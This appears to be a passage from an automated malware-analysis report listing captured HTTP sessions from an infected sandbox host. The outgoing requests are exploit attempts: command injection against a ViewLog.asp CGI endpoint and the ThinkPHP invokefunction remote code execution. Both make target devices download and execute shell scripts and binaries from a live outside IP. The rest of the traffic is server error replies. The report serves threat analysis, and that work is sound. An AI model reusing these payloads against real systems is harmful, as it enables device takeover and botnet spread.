                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:51.433604002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:57.577383041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:09.608860016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:33.671915054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821866035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.143383495.110.225.408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.291802883 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.509879112 CET207INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 14 Feb 2024 08:32:48 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.143631631.16.221.1508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.294706106 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.519551992 CET129INHTTP/1.1 404 Not Found
                                                        Server: JAWS/1.0 Feb 20 2019
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-length: 213


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.145565885.206.52.548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.298752069 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.525053024 CET254INHTTP/1.0 200 OK
                                                        Server: httpd/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:44 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 3f 65 72 72 6f 72 5f 73 74 61 74 75 73 3d 31 26 70 61 67 65 3d 69 6e 64 65 78 2e 61 73 70 26 6c 6f 63 6b 5f 74 69 6d 65 3d 30 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp?error_status=1&page=index.asp&lock_time=0';</script></HEAD></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.144101685.209.139.1008080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.327353954 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:32:48.571054935 CET1286INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:06:59 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.145569485.206.52.548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:48.748465061 CET272INHTTP/1.0 400 Bad Request
                                                        Server: httpd/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:45 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.144852495.215.58.22080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:55.999830961 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:56.209180117 CET219INHTTP/1.1 400 Bad request
                                                        Content-length: 90
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        46192.168.2.144666695.216.168.22680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.016424894 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:56.243093967 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.144875695.173.189.21580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.039998055 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:56.289963961 CET932INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 681
                                                        date: Wed, 14 Feb 2024 08:32:54 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.145423888.221.156.5480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.161098957 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:56.321527958 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:32:56 GMT
                                                        Date: Wed, 14 Feb 2024 08:32:56 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 34 64 64 62 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 35 37 36 26 23 34 36 3b 32 63 64 35 37 62 64 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;984ddb17&#46;1707899576&#46;2cd57bd1</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.143356088.221.176.14680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:56.188364029 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:56.376230955 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:32:56 GMT
                                                        Date: Wed, 14 Feb 2024 08:32:56 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 63 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 35 37 36 26 23 34 36 3b 38 65 63 35 31 64 38 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;dc3e1202&#46;1707899576&#46;8ec51d82</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.143797288.198.141.7380
                                                        TimestampBytes transferredDirectionData
